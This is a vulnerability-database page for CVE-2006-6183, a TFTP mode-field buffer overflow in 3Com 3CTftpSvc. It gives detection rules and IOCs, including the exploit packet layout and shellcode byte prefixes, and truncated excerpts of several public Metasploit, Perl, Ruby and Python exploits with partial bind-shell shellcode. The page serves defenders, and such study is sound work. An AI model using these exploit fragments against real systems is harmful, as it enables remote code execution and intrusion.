CVE-2006-6183
published 2006-12-01CVE-2006-6183: Multiple stack-based buffer overflows in 3Com 3CTftpSvc 2.0.1, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute…
PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
70.57%
99.3th percentile
Multiple stack-based buffer overflows in 3Com 3CTftpSvc 2.0.1, and possibly earlier, allow remote attackers to cause a denial of service (crash) or execute arbitrary code via a long mode field (aka transporting mode) in a (1) GET or (2) PUT command.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3com | 3ctftpsvc | <= 2.0.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x02 (TFTP WRQ opcode prefix for exploit packet)
bytes↗
\x00\x02 + filename + \x00 + NOP*129 + shellcode + ret + \x00 (exploit packet structure)
- →Alert on UDP port 69 packets where the TFTP mode field (after the null-terminated filename) exceeds 460–470 bytes in a RRQ (opcode 0x0001) or WRQ (opcode 0x0002) request. ↗
- →Inspect TFTP WRQ/RRQ packets (opcodes \x00\x01 and \x00\x02) on UDP/69 for NOP sleds (0x90 sequences of 73–129 bytes) immediately following the null-terminated filename, indicating exploit delivery. ↗
- →Detect TFTP packets on UDP/69 containing the known bind-shell shellcode byte sequences from public exploits (e.g., starting with \x31\xc9\x83\xe9\xb0 or \x2b\xc9\x83\xe9\xb0) in the mode field. ↗
- →Monitor for TFTP mode field payloads containing known ROP/return addresses for user32.dll on Windows XP SP2 (\x3b\xe2\xd4\x77 or \x63\x20\xdc\x77) packed as little-endian 4-byte sequences. ↗
- →Flag any TFTP session where the mode field does not match standard TFTP mode strings ('netascii', 'octet', 'mail') and is anomalously long. ↗
- →After exploitation, watch for unexpected inbound TCP connections to port 4444 on Windows hosts running 3CTftpSvc, indicative of the bind-shell payload. ↗
- ·The Metasploit module uses EXITFUNC=thread (later version) vs EXITFUNC=seh (earlier version); the return address differs between module versions and targets — ensure the correct target index is matched to the victim OS/SP. ↗
- ·The payload bad character set is \x00 only; null bytes terminate the TFTP mode field and cannot appear in shellcode. ↗
- ·Payload space is constrained (344–400 bytes depending on exploit version); staged or small payloads must be used. ↗
- ·The vulnerability affects 3CTftpSvc 2.0.1 and possibly earlier versions; the return addresses are OS/SP-specific and will not work across different Windows versions without adjustment. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)
3Com TFTP Service (3CTftpSvc) - 'Mode' Remote Buffer Overflow (Metasploit)
---
##
# $Id: threectftpsvc_long_mode.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 '3CTftpSvc TFTP Long Mode Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By
sending a specially crafted packet with an overly long mode
field, a remote attacker could overflow a buffer and execute
arbitrary code on the system.
},
'Author' => 'MC',
'Version' => '$Revision: 9262 $',
'Reference
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
exploitdb·2007-02-28
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode
---
#!/usr/bin/perl -w
# ===============================================================================================
# 3Com TFTP Service \n\n";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x48".
"\xc8\xb3\x54\x83\xeb\xfc\xe2\xf4\xb4\xa2\x58\x19\xa0\x31\x4c\xab".
"\xb7\xa8\x38\x38\x6c\xec\x38\x11\x74\x43\xcf\x51\x30\xc9\x5c\xdf".
"\x07\xd0\x38\x0b\x68\xc9\x58\x1d\xc3\xfc\x38\x55\xa6\xf9\x73\xcd".
"\xe4\x4c\x73\x20\x4f\x09\x79\x59\x49\x0a\x58\xa0\x73\x9
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)
exploitdb·2007-01-21
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)
3Com TFTP Service (3CTftpSvc) 2.0.1 - Remote Buffer Overflow (Metasploit)
---
package Msf::Exploit::3com_tftp_long_mode;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket;
my $advanced =
{
};
my $info =
{
'Name' => 'TFTP Server 3CTftpSvc Buffer Overflow Vulnerability',
'Version' => '$ 1.0 $',
'Authors' => ['Enseirb ', ],
'Description' =>
Pex::Text::Freeform(qq{
This vulnerability is caused due to a boundary error during the processing of TFTP Read/Write request packet types. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted packet with an overly long mode field (more than 460 bytes).
}),
'Arch' => [ 'x86' ],
'OS' => [ 'win32' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'seh' },
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
exploitdb·2006-11-30
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Remote Overflow
---
# 3comtftpd_xpsp2.rb
#
# Copyright (C) cthulhu
#
#
# This is a poc intended to exploit the 3Com TFTP Service version 2.0.1
# long transporting mode buffer overflow under xp sp2 english
# (Vulnerability discovered by Liu Qixu)
#
# Usage :
# ruby 3comftpd_xpsp2.rb
# Default port is 69 if not specified
require 'socket'
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
sc1 = "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x02"
sc1 += "\xaf\xbb\x16\x83\xeb\xfc\xe2\xf4\xfe\xc5\x50\x5b\xea\x56\x44\xe9"
sc1 +="\xfd\xcf\x30\x7a\x26\x8b\x30\x53\x3e\x24\xc7\x13\x7a\xae\x54\x9d"
sc1 +="\x4d\xb7\x30\x49\x22\xae\x50\x5f\x89\x9b\x30\x17\xec\x9e\x7b\x8f"
sc1 +="\x
Exploit-DB
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)
exploitdb·2006-11-27
CVE-2006-6183 3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)
3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow (PoC)
---
#!/usr/bin/python
# Buffer Overflow (Long transporting mode) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
# SUMMARY:
# 3CTftpSvc TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://support.3com.com/software/utilities_for_windows_32_bit.htm
# or ftp://ftp.3com.com/pub/utilbin/win32/3CTftpSvc.zip)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in 3CTftpSvc TFTP Server, which could be exploited by attackers
# to execute arbitrary commands or cause a denial of service. This flaw is
# due to a buffer overflow error when handling an overly lo
Metasploit
3CTftpSvc TFTP Long Mode Buffer Overflow
metasploit
3CTftpSvc TFTP Long Mode Buffer Overflow
3CTftpSvc TFTP Long Mode Buffer Overflow
This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By sending a specially crafted packet with an overly long mode field, a remote attacker could overflow a buffer and execute arbitrary code on the system.
No writeups or analysis indexed.
http://secunia.com/advisories/23113http://securityreason.com/securityalert/1930http://www.securityfocus.com/archive/1/452754/100/0/threadedhttp://www.securityfocus.com/bid/21301http://www.securityfocus.com/bid/21322http://www.vupen.com/english/advisories/2006/4738https://exchange.xforce.ibmcloud.com/vulnerabilities/30545http://secunia.com/advisories/23113http://securityreason.com/securityalert/1930http://www.securityfocus.com/archive/1/452754/100/0/threadedhttp://www.securityfocus.com/bid/21301http://www.securityfocus.com/bid/21322http://www.vupen.com/english/advisories/2006/4738https://exchange.xforce.ibmcloud.com/vulnerabilities/30545
2006-12-01
Published